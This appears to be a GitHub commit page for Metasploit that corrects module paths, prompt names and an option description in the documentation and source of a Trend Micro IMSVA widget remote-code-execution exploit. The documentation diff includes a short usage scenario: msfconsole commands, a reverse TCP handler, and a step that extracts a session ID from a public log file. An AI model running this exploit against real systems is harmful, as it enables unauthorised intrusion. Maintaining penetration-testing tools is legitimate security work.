Skip to content

Commit a2d32b4

Browse files
committed
Fixing grammer issue
1 parent 395c820 commit a2d32b4

File tree

2 files changed

+6
-6
lines changed

2 files changed

+6
-6
lines changed

documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -28,7 +28,7 @@ If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-
2828
A successful check of the exploit will look like this:
2929

3030
- [ ] Start `msfconsole`
31-
- [ ] `use exploit/windows/http/trendmicro_imsva_widget_exec`
31+
- [ ] `use exploit/linux/http/trendmicro_imsva_widget_exec`
3232
- [ ] Set `RHOST`
3333
- [ ] Set `LHOST`
3434
- [ ] Run `check`
@@ -40,12 +40,12 @@ A successful check of the exploit will look like this:
4040
## Scenarios
4141

4242
```
43-
msf > use exploit/windows/http/trendmicro_imsva_widget_exec
44-
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201
43+
msf > use exploit/linux/http/trendmicro_imsva_widget_exec
44+
msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201
4545
RHOST => 12.0.0.184
46-
msf exploit(trendmicro_officescan_exec) > check
46+
msf exploit(trendmicro_imsva_widget_exec) > check
4747
[*] 12.0.0.184:443 The target appears to be vulnerable.
48-
msf exploit(trendmicro_officescan_exec) > exploit
48+
msf exploit(trendmicro_imsva_widget_exec) > exploit
4949
5050
[*] Started reverse TCP handler on 12.0.0.1:4444
5151
[*] Extracting JSESSIONID from publicly accessible log file

modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -47,7 +47,7 @@ def initialize(info={})
4747

4848
register_options(
4949
[
50-
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
50+
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])
5151
]
5252
)
5353
end

0 commit comments

Comments
 (0)